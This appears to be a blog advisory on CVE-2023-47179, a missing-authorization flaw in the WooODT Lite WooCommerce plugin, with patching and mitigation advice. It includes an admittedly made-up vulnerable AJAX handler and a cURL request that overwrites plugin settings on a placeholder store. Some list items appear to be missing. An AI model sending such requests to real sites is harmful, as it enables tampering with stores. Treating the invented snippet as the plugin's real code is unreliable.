CVE-2023-47179 - How Missing Authorization in WooODT Lite Puts Your WooCommerce Store at Risk (With Example Exploit)

---

What is CVE-2023-47179?

CVE-2023-47179 is a security vulnerability found in the popular ByConsole WooODT Lite WordPress plugin, affecting versions up to and including 2.4.6. If you use this plugin to manage order delivery or pickup times on your WooCommerce shop, you could be exposed!

The issue is classified as a Missing Authorization check. That means the plugin doesn’t properly check a user’s permission before letting them access some core functionality. As a result, an attacker could perform sensitive operations they shouldn’t have access to.

Why Does This Happen? (The Technical Part)

Many plugins use “capability” checks that only allow certain actions for logged-in admins or shop managers. With WooODT Lite, some backend routes simply forget to check if a user has the right privileges.

For instance, there are API-style endpoints (AJAX and REST calls) or admin pages where the code doesn’t verify if the current user should actually be allowed to perform the requested action.

Any setup where WooODT Lite is active and not patched

Important: If you use this plugin, upgrade immediately. ByConsole has released updates on the WordPress plugin directory (search for “woo-order-delivery-or-pickup-with-date-and-time”) to address this!

Potentially execute functions with admin-like power

Depending on how your site is set up, it could even open up for privilege escalation or information leaks.

Example Exploit: Exploiting the Missing Authorization

Suppose the plugin registers an AJAX handler or REST endpoint like /wp-admin/admin-ajax.php?action=update_odt_settings. Here’s a made-up code snippet to show what might go wrong:

// File: woo-odt-lite/includes/ajax.php

add_action( 'wp_ajax_update_odt_settings', 'bc_odt_update_settings' );

function bc_odt_update_settings() {
    // MISSING: check for current_user_can('manage_options') or nonce check!
    $new_settings = $_POST['settings'];
    update_option( 'bwoocommerce_odt_settings', $new_settings );
    echo json_encode(array('status' => 'success'));
    wp_die();
}

If there’s no capability or nonce check, any logged-in user (sometimes *any visitor*) can POST to this endpoint and change settings.

Exploit example using cURL

curl -i -X POST \
  -d "action=update_odt_settings&settings[some_option]=malicious" \
  "https://victimstore.com/wp-admin/admin-ajax.php";

If the site wasn’t checking for admin rights, this would reconfigure core plugin features!

References and Official Sources

- NVD listing for CVE-2023-47179
- ByConsole WooODT Lite WordPress plugin page
- Patchstack Security Advisory
- WPScan entry

If you can’t update, disable the plugin until safe.

3. For custom security, add firewall or WAF rules blocking direct calls to plugin AJAX handlers by non-admins.

Conclusion

CVE-2023-47179 in ByConsole WooODT Lite is a big deal for WooCommerce shop owners. A simple missing user check in the code can let attackers quietly hijack your pickup/delivery settings. Make sure to patch now and always look out for authorization checks when you install new plugins!

Timeline

Published on: 01/02/2025 12:15:14 UTC